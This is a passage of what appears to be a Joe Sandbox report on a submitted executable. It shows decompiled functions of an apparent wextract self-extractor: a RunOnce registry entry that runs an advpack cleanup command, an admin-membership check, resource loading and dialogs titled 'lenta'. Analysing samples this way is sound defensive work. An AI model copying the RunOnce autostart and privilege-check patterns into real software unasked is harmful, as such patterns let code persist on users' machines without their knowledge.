                                                                                                                                                                                                                                            							_pop(_t47);
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t33 =  *_t42;
                                                                                                                                                                                                                                            								_t42 = _t42 + 1;
                                                                                                                                                                                                                                            							} while (_t33 != 0);
                                                                                                                                                                                                                                            							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                            						_pop(_t38);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_pop(_t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            0x008d2272
                                                                                                                                                                                                                                            0x008d2277
                                                                                                                                                                                                                                            0x008d2279
                                                                                                                                                                                                                                            0x008d2283
                                                                                                                                                                                                                                            0x008d2289
                                                                                                                                                                                                                                            0x008d22ab
                                                                                                                                                                                                                                            0x008d22b1
                                                                                                                                                                                                                                            0x008d22c4
                                                                                                                                                                                                                                            0x008d22e0
                                                                                                                                                                                                                                            0x008d22e6
                                                                                                                                                                                                                                            0x008d22f5
                                                                                                                                                                                                                                            0x008d230d
                                                                                                                                                                                                                                            0x008d231c
                                                                                                                                                                                                                                            0x008d231c
                                                                                                                                                                                                                                            0x008d2321
                                                                                                                                                                                                                                            0x008d233a
                                                                                                                                                                                                                                            0x008d2342
                                                                                                                                                                                                                                            0x008d2348
                                                                                                                                                                                                                                            0x008d234b
                                                                                                                                                                                                                                            0x008d234c
                                                                                                                                                                                                                                            0x008d234c
                                                                                                                                                                                                                                            0x008d234e
                                                                                                                                                                                                                                            0x008d234f
                                                                                                                                                                                                                                            0x008d236e
                                                                                                                                                                                                                                            0x008d236e
                                                                                                                                                                                                                                            0x008d237a
                                                                                                                                                                                                                                            0x008d2380
                                                                                                                                                                                                                                            0x008d2380
                                                                                                                                                                                                                                            0x008d2381
                                                                                                                                                                                                                                            0x008d2381
                                                                                                                                                                                                                                            0x008d238f

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 008D22A3
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 008D22D8
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 008D22F5
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 008D2305
                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 008D236E
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 008D237A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 008D232D
                                                                                                                                                                                                                                            • wextract_cleanup0, xrefs: 008D227C, 008D22CD, 008D2363
                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 008D2299
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008D2321
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                                                                            • API String ID: 3027380567-2036266374
                                                                                                                                                                                                                                            • Opcode ID: cb9453daa20fd610e9b0f639ac607ecf78d6df9b63e38507111416319f959b0f
                                                                                                                                                                                                                                            • Instruction ID: 721b84c58676483ac98c959aa2fec9d5678cbe54e24f98ca5ce2db89ef72a867
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb9453daa20fd610e9b0f639ac607ecf78d6df9b63e38507111416319f959b0f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C31C871A00218ABDB259B55DC49FDAB77CFF54710F0003A7F50DE6251EA756F88CA50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                                            			E008D3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                                                                                            				struct HWND__* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t8 = _a8 - 0xf;
                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                            					if( *0x8d8590 == 0) {
                                                                                                                                                                                                                                            						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                            						 *0x8d8590 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t8 - 1;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                                            					EndDialog(_a4, ??);
                                                                                                                                                                                                                                            					L9:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                            				if(_t15 == 0) {
                                                                                                                                                                                                                                            					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t33 = _a4;
                                                                                                                                                                                                                                            					E008D43D0(_t33, _t16);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t33, 0x834,  *0x8d8d4c);
                                                                                                                                                                                                                                            					SetWindowTextA(_t33, "lenta");
                                                                                                                                                                                                                                            					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                            					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                            					 *0x8d88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                            					SetWindowLongA(_t34, 0xfffffffc, E008D30C0);
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t15 != 1) {
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a12 != 6) {
                                                                                                                                                                                                                                            					if(_a12 != 7) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                            				goto L8;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            0x008d3108
                                                                                                                                                                                                                                            0x008d310b
                                                                                                                                                                                                                                            0x008d31b7
                                                                                                                                                                                                                                            0x008d31ca
                                                                                                                                                                                                                                            0x008d31d0
                                                                                                                                                                                                                                            0x008d31d0
                                                                                                                                                                                                                                            0x008d31da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d31da
                                                                                                                                                                                                                                            0x008d3111
                                                                                                                                                                                                                                            0x008d3114
                                                                                                                                                                                                                                            0x008d3136
                                                                                                                                                                                                                                            0x008d3136
                                                                                                                                                                                                                                            0x008d3138
                                                                                                                                                                                                                                            0x008d313b
                                                                                                                                                                                                                                            0x008d3141
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3143
                                                                                                                                                                                                                                            0x008d3116
                                                                                                                                                                                                                                            0x008d311b
                                                                                                                                                                                                                                            0x008d314b
                                                                                                                                                                                                                                            0x008d3151
                                                                                                                                                                                                                                            0x008d3158
                                                                                                                                                                                                                                            0x008d316a
                                                                                                                                                                                                                                            0x008d3176
                                                                                                                                                                                                                                            0x008d317d
                                                                                                                                                                                                                                            0x008d318b
                                                                                                                                                                                                                                            0x008d319e
                                                                                                                                                                                                                                            0x008d31a3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d31ad
                                                                                                                                                                                                                                            0x008d3120
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d312a
                                                                                                                                                                                                                                            0x008d3134
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3134
                                                                                                                                                                                                                                            0x008d312c
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 008D313B
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 008D314B
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000834), ref: 008D316A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,lenta), ref: 008D3176
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 008D317D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000834), ref: 008D3185
                                                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000FC), ref: 008D3190
                                                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000FC,008D30C0), ref: 008D31A3
                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 008D31CA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                            • String ID: lenta
                                                                                                                                                                                                                                            • API String ID: 3785188418-2780258678
                                                                                                                                                                                                                                            • Opcode ID: 37c80058ed2bd57d6ffb77b7857283bc8e11549777b8b75762b9c724935aa03e
                                                                                                                                                                                                                                            • Instruction ID: 5f93ee0a40111ab21edc35a2b44337d0d28a069f33f581871233c3ab21e098b5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37c80058ed2bd57d6ffb77b7857283bc8e11549777b8b75762b9c724935aa03e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2311AF31246216BBDF156B24AC0CB5A3B64FB4A720F200713F826D22E0DB759A41C647
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E008D468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				CHAR* _t14;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				long _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 = __ecx;
                                                                                                                                                                                                                                            				_t11 = __edx;
                                                                                                                                                                                                                                            				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                                                            				_t16 = _t4;
                                                                                                                                                                                                                                            				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                                                            					if(_t16 == 0) {
                                                                                                                                                                                                                                            						L5:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                                                            					FreeResource(_t15);
                                                                                                                                                                                                                                            					return _t16;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x008d4699
                                                                                                                                                                                                                                            0x008d469b
                                                                                                                                                                                                                                            0x008d46a9
                                                                                                                                                                                                                                            0x008d46af
                                                                                                                                                                                                                                            0x008d46b4
                                                                                                                                                                                                                                            0x008d46bc
                                                                                                                                                                                                                                            0x008d46f9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d46f9
                                                                                                                                                                                                                                            0x008d46d9
                                                                                                                                                                                                                                            0x008d46dd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d46e5
                                                                                                                                                                                                                                            0x008d46ef
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d46f5
                                                                                                                                                                                                                                            0x008d46ff

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46A0
                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46A9
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46C3
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46CC
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46D3
                                                                                                                                                                                                                                            • memcpy_s.MSVCRT ref: 008D46E5
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46EF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                            • String ID: TITLE$lenta
                                                                                                                                                                                                                                            • API String ID: 3370778649-2035842925
                                                                                                                                                                                                                                            • Opcode ID: c2f74627c2d826714f1479f11799466cab3f22a57adf5ade453fb50234364758
                                                                                                                                                                                                                                            • Instruction ID: f396dae84785b3b78845815971fdab7d883e13766246b9ff1aa052fb752e1fa1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2f74627c2d826714f1479f11799466cab3f22a57adf5ade453fb50234364758
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7601D6322412007BF31417A56C0DF2B3F2CFBC6B52F144216FB4AC6240CD71CC4082A2
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                                                                                                                            			E008D17EE(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                                            				intOrPtr* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t37 = __ecx;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v28 = __ecx;
                                                                                                                                                                                                                                            				_t28 = 0;
                                                                                                                                                                                                                                            				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                            					_v20 = _t20;
                                                                                                                                                                                                                                            					if(_t20 != 0) {
                                                                                                                                                                                                                                            						 *_t37 = 0;
                                                                                                                                                                                                                                            						_t28 = 1;
                                                                                                                                                                                                                                            						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                            							_t37 = _t39;
                                                                                                                                                                                                                                            							 *0x8da288(0, _v24, _v28);
                                                                                                                                                                                                                                            							_v20();
                                                                                                                                                                                                                                            							if(_t39 != _t39) {
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							FreeSid(_v24);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					FreeLibrary(_t36);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            0x008d17f6
                                                                                                                                                                                                                                            0x008d17fd
                                                                                                                                                                                                                                            0x008d1805
                                                                                                                                                                                                                                            0x008d180b
                                                                                                                                                                                                                                            0x008d180d
                                                                                                                                                                                                                                            0x008d1815
                                                                                                                                                                                                                                            0x008d1818
                                                                                                                                                                                                                                            0x008d1820
                                                                                                                                                                                                                                            0x008d1824
                                                                                                                                                                                                                                            0x008d182c
                                                                                                                                                                                                                                            0x008d1832
                                                                                                                                                                                                                                            0x008d1837
                                                                                                                                                                                                                                            0x008d1851
                                                                                                                                                                                                                                            0x008d1854
                                                                                                                                                                                                                                            0x008d185d
                                                                                                                                                                                                                                            0x008d1862
                                                                                                                                                                                                                                            0x008d186c
                                                                                                                                                                                                                                            0x008d1872
                                                                                                                                                                                                                                            0x008d1877
                                                                                                                                                                                                                                            0x008d187e
                                                                                                                                                                                                                                            0x008d187e
                                                                                                                                                                                                                                            0x008d1883
                                                                                                                                                                                                                                            0x008d1883
                                                                                                                                                                                                                                            0x008d185d
                                                                                                                                                                                                                                            0x008d188a
                                                                                                                                                                                                                                            0x008d188a
                                                                                                                                                                                                                                            0x008d18a2

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,008D18DD), ref: 008D181A
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 008D182C
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(008D18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,008D18DD), ref: 008D1855
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?,?,?,?,008D18DD), ref: 008D1883
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,008D18DD), ref: 008D188A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                            • Opcode ID: 68901455e7c5b40d7fdb4adb13be22d557d883f74ae29a968ec2bf5dd8faa530
                                                                                                                                                                                                                                            • Instruction ID: 5fbea8ff8a05be511d1c95d5842e59673e58b6ae4a873d382d3d200a3bee5aa5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68901455e7c5b40d7fdb4adb13be22d557d883f74ae29a968ec2bf5dd8faa530
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72115175E01209EBDB149FA5EC49ABEBB78FF44711F10026BF915E2391DB709D048B91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                                            				int _t22;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t7 == 0) {
                                                                                                                                                                                                                                            					EndDialog(_a4, 2);
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t24 = _a4;
                                                                                                                                                                                                                                            					E008D43D0(_t24, _t12);
                                                                                                                                                                                                                                            					SetWindowTextA(_t24, "lenta");
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t24, 0x838,  *0x8d9404);
                                                                                                                                                                                                                                            					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t11 == 1) {
                                                                                                                                                                                                                                            					_t22 = _a12;
                                                                                                                                                                                                                                            					if(_t22 < 6) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 <= 7) {
                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                            						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 != 0x839) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0x8d91dc = 1;
                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x008d3459
                                                                                                                                                                                                                                            0x008d345c
                                                                                                                                                                                                                                            0x008d34d8
                                                                                                                                                                                                                                            0x008d34de
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d34e0
                                                                                                                                                                                                                                            0x008d345e
                                                                                                                                                                                                                                            0x008d3463
                                                                                                                                                                                                                                            0x008d349a
                                                                                                                                                                                                                                            0x008d34a0
                                                                                                                                                                                                                                            0x008d34a7
                                                                                                                                                                                                                                            0x008d34b2
                                                                                                                                                                                                                                            0x008d34c4
                                                                                                                                                                                                                                            0x008d34cb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d34cb
                                                                                                                                                                                                                                            0x008d3468
                                                                                                                                                                                                                                            0x008d346e
                                                                                                                                                                                                                                            0x008d3474
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d347c
                                                                                                                                                                                                                                            0x008d348c
                                                                                                                                                                                                                                            0x008d3490
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3496
                                                                                                                                                                                                                                            0x008d3484
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3486
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3486
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 008D3490
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 008D349A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,lenta), ref: 008D34B2
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000838), ref: 008D34C4
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 008D34CB
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000002), ref: 008D34D8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                            • String ID: lenta
                                                                                                                                                                                                                                            • API String ID: 852535152-2780258678
                                                                                                                                                                                                                                            • Opcode ID: 0309ea1e9407d320f6918030b4a23e74fc556a33b70204c2c4151082bdba0a60
                                                                                                                                                                                                                                            • Instruction ID: dc1e8a4f9fed1bed1dbd9e8b90874a8c54b5bcf636b69d0fabeb56159a4f9f6f
